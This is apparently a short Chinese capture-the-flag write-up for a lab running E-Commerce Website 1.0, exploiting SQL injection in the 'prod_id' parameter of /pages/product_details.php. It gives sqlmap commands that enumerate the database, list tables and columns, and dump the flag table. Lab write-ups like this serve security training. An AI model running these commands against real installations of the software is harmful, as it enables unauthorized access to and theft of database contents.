目录
靶标介绍
E-Commerce Website 1.0 允许通过“/pages/product_details.php”中的参数“prod_id”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
开启靶场
根据靶标介绍,允许通过“/pages/product_details.php”中的参数“prod_id”进行 SQL 注入,然后构造 URL“/pages/product_details.php/?prod_id=1”
sqlmap 获取当前数据库名
python sqlmap.py -u "http://eci-2zehg568bnooyrfyzzie.cloudeci1.ichunqiu.com/pages/product_details.php/?prod_id=1" --batch --current-db
sqlmap 获取数据库中的表
python sqlmap.py -u "http://eci-2zehg568bnooyrfyzzie.cloudeci1.ichunqiu.com/pages/product_details.php/?prod_id=1" --batch -D electricks --tables
发现可疑表名“flllaaaag”
sqlmap 获取表中字段名
python sqlmap.py -u "http://eci-2zehg568bnooyrfyzzie.cloudeci1.ichunqiu.com/pages/product_details.php/?prod_id=1" --batch -D electricks -T flllaaaag --columns
发现字段名 flag
sqlmap 获取字段下的数据
python sqlmap.py -u "http://eci-2zehg568bnooyrfyzzie.cloudeci1.ichunqiu.com/pages/product_details.php/?prod_id=1" --batch -D electricks -T flllaaaag -C flag --dump
得到了本关的 flag